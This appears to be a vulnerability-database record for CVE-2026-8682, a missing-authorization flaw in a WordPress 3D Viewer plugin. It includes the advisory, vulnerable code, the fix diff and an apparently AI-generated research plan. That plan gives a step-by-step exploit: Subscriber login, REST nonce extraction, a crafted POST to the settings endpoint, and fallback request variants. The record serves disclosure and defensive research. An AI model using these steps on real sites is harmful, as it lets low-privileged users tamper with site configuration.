[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fygNtPaKVGXDsl_bLYpsio2YTSQD9nOrQCTPfk4QG3vw":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-8682","3d-viewer-missing-authorization-to-authenticated-subscriber-arbitrary-plugin-settings-modification-via-settings-rest-end","3D Viewer \u003C= 2.0.1 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Plugin Settings Modification via settings REST endpoint","The 3D Viewer – 3D Model Viewer – Augmented Reality – Virtual Try On plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 2.0.1. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with subscriber-level access and above, to modify all plugin settings by writing arbitrary data to the ar_try_on_settings option in the database via the \u002Fwp-json\u002Far_try_on\u002Fv1\u002Fsettings REST endpoint.","ar-vr-3d-model-try-on",null,"\u003C=2.0.1","2.0.2","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-05-27 00:00:00","2026-05-28 06:45:42",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fbfcd914c-3c12-4e6a-bb05-38d42ce411d4?source=api-prod",1,[22,23,24,25,26,27,28,29],"README.txt","admin\u002Fjs\u002Fbuild\u002Far-try-on-dashboard-ui.min.js","admin\u002Fjs\u002Fbuild\u002Far-try-on-metabox-ui.min.js","admin\u002Fjs\u002Fbuild\u002Far-vr-3d-model-try-on-preview.min.js","api\u002FAR_TRY_ON_Api_Routes.php","ar-vr-3d-model-try-on.php","blocks\u002Fatlas-ar-block.js","includes\u002FAR_TRY_ON_Helper.php","researched",false,3,"This research plan outlines the steps required to analyze and exploit CVE-2026-8682, a missing authorization vulnerability in the **3D Viewer – 3D Model Viewer – Augmented Reality – Virtual Try On** plugin for WordPress.\n\n## 1. Vulnerability Summary\nThe vulnerability exists in the REST API handler for the `\u002Fwp-json\u002Far_try_on\u002Fv1\u002Fsettings` endpoint. The plugin registers this route with a `permission_callback` named `get_route_access`, which fails to properly verify that the authenticated user possesses the `manage_options` capability. Consequently, any authenticated user, including those with **Subscriber** level permissions, can send a `POST` request to this endpoint to overwrite the `ar_try_on_settings` option in the WordPress database with arbitrary data.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-json\u002Far_try_on\u002Fv1\u002Fsettings`\n- **HTTP Method:** `POST`\n- **Vulnerable Parameter:** `fields` (Expected to be a JSON-encoded string).\n- **Authentication:** Required (Subscriber or higher).\n- **Preconditions:** The attacker must be authenticated and obtain a valid WordPress REST API nonce (`_wpnonce`).\n\n## 3. Code Flow\nThe vulnerability is located in `api\u002FAR_TRY_ON_Api_Routes.php`.\n\n1.  **Route Registration:** The constructor calls `ATLAS_AR_register_routes()`, which uses `register_rest_route` to define the `\u002Fsettings` endpoint.\n    ```php\n    register_rest_route(\n        $this->namespace, \u002F\u002F 'ar_try_on\u002Fv1'\n        '\u002Fsettings',\n        array(\n            array(\n                'methods' => \\WP_REST_Server::ALLMETHODS,\n                'callback' => array($this, 'settings'),\n                'permission_callback' => array($this, 'get_route_access'), \u002F\u002F Vulnerable check\n                'args' => array(),\n            ),\n        )\n    );\n    ```\n2.  **Authorization Check:** The `permission_callback` is mapped to `get_route_access`. While the source code for this specific function is truncated in the provided snippet, the vulnerability report confirms it permits Subscriber-level access.\n3.  **Data Processing:** When a `POST` request is received, the `settings()` method is executed:\n    ```php\n    public function settings($request)\n    {\n        $response['status'] = true;\n        if ('post' == $request['method']) {\n            \u002F\u002F Decodes the 'fields' parameter from the request\n            $fields = json_decode($request['fields'], true);\n            \u002F\u002F DIRECT SINK: Updates the plugin settings option with user-provided data\n            update_option('ar_try_on_settings', $fields);\n            \n            \u002F\u002F ... cache clearing logic ...\n            return rest_ensure_response($response);\n        }\n        \u002F\u002F ...\n    }\n    ```\n\n## 4. Nonce Acquisition Strategy\nTo interact with the WordPress REST API as an authenticated user, a `_wpnonce` is typically required.\n\n1.  **Authentication:** Log in to the WordPress site as a **Subscriber**.\n2.  **Retrieval via Browser:** Navigate to any admin page (e.g., `\u002Fwp-admin\u002Fprofile.php`).\n3.  **Execution:** Use `browser_eval` to extract the global WordPress API settings nonce.\n    - **JS Variable:** `window.wpApiSettings.nonce`\n4.  **Alternative:** Check if the plugin localizes its own nonce. The UI script `admin\u002Fjs\u002Fbuild\u002Far-try-on-dashboard-ui.min.js` likely consumes this API. If a specific nonce is used in the `permission_callback`, it may be found in a localized object (though standard REST routes usually rely on the default `wp_rest` nonce).\n\n## 5. Exploitation Strategy\nThe goal is to modify the `ar_try_on_settings` option to demonstrate arbitrary data injection.\n\n### Step 1: Authentication\nAuthenticate as a Subscriber and capture the session cookies.\n\n### Step 2: Obtain REST Nonce\nNavigate to `\u002Fwp-admin\u002Fprofile.php` and run:\n`nonce = browser_eval(\"window.wpApiSettings.nonce\")`\n\n### Step 3: Send Malicious Request\nSend a `POST` request to the settings endpoint.\n\n- **URL:** `http:\u002F\u002F[target]\u002Fwp-json\u002Far_try_on\u002Fv1\u002Fsettings`\n- **Headers:** \n    - `Content-Type: application\u002Fx-www-form-urlencoded`\n    - `X-WP-Nonce: [obtained_nonce]`\n- **Body:**\n    ```\n    method=post&fields={\"pwned_by\":\"security_researcher\",\"ar_try_on_allowed_post_types\":[\"post\",\"page\",\"attachment\"]}&has_value_changed=true\n    ```\n    *Note: The `method=post` parameter is required because the plugin checks `$request['method']` explicitly in the `settings()` function.*\n\n## 6. Test Data Setup\n1.  Install and activate the plugin \"3D Viewer – 3D Model Viewer – Augmented Reality – Virtual Try On\" (version 2.0.1).\n2.  Create a user with the **Subscriber** role.\n3.  (Optional) Note the existing settings via WP-CLI: `wp option get ar_try_on_settings`.\n\n## 7. Expected Results\n- The server should return a `200 OK` status code.\n- The JSON response should contain `{\"status\":true,\"data\":{...}}` echoing the injected fields.\n- The database option `ar_try_on_settings` will now contain the attacker-supplied JSON structure.\n\n## 8. Verification Steps\nAfter the exploit attempt, verify the database state using WP-CLI:\n```bash\nwp option get ar_try_on_settings --format=json\n```\nCheck if the key `\"pwned_by\"` exists and matches `\"security_researcher\"`.\n\n## 9. Alternative Approaches\nIf the `POST` method is blocked or requires a different structure:\n1.  **JSON Body:** Try sending the payload as a raw JSON body with `Content-Type: application\u002Fjson`.\n2.  **Query Parameter:** Try passing `fields` as a GET parameter if the server allows `ALLMETHODS` for the POST callback logic (though the code explicitly checks `$request['method']`).\n3.  **Method Spoofing:** Use `X-HTTP-Method-Override: POST` if the server is configured to restrict standard POST requests.","The 3D Viewer plugin for WordPress fails to implement proper authorization checks on its REST API settings endpoint. Authenticated users with subscriber-level permissions can send a POST request to overwrite the plugin's configuration option ('ar_try_on_settings') in the database with arbitrary data.","\u002F\u002F api\u002FAR_TRY_ON_Api_Routes.php lines 42-53\nregister_rest_route(\n    $this->namespace,\n    '\u002Fsettings',\n    array(\n        array(\n            'methods' => \\WP_REST_Server::ALLMETHODS,\n            'callback' => array($this, 'settings'),\n            'permission_callback' => array($this, 'get_route_access'),\n            'args' => array(),\n        ),\n    )\n);\n\n---\n\n\u002F\u002F api\u002FAR_TRY_ON_Api_Routes.php lines 102-110\npublic function settings($request)\n{\n    $response['status'] = true;\n    \u002F\u002F save data about recording.\n    if ('post' == $request['method']) {\n        $fields = json_decode($request['fields'], true);\n        update_option('ar_try_on_settings', $fields);\n        AR_TRY_ON_Cache::delete('settings');","--- api\u002FAR_TRY_ON_Api_Routes.php\n+++ api\u002FAR_TRY_ON_Api_Routes.php\n@@ -130,1 +130,5 @@\n-    public function get_route_access()\n+    public function get_route_access($request)\n     {\n-        return true;\n+        return current_user_can('manage_options');\n     }","To exploit this vulnerability, an attacker follows these steps:\n1. Authenticate to the WordPress site as a user with Subscriber-level permissions or higher.\n2. Obtain a valid WordPress REST API nonce from any admin dashboard page (e.g., via window.wpApiSettings.nonce).\n3. Construct a POST request to the endpoint `\u002Fwp-json\u002Far_try_on\u002Fv1\u002Fsettings`.\n4. Include a body parameter named 'method' with the value 'post'.\n5. Include a body parameter named 'fields' containing a JSON-encoded string of the desired plugin settings. \n6. Upon execution, the `settings()` callback decodes the 'fields' JSON and passes it directly to `update_option()`, effectively allowing the attacker to control the plugin's behavior or inject data.","gemini-3-flash-preview","2026-06-04 18:20:52","2026-06-04 18:21:46",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","2.0.1","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Far-vr-3d-model-try-on\u002Ftags\u002F2.0.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Far-vr-3d-model-try-on.2.0.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Far-vr-3d-model-try-on\u002Ftags\u002F2.0.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Far-vr-3d-model-try-on.2.0.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Far-vr-3d-model-try-on\u002Ftags"]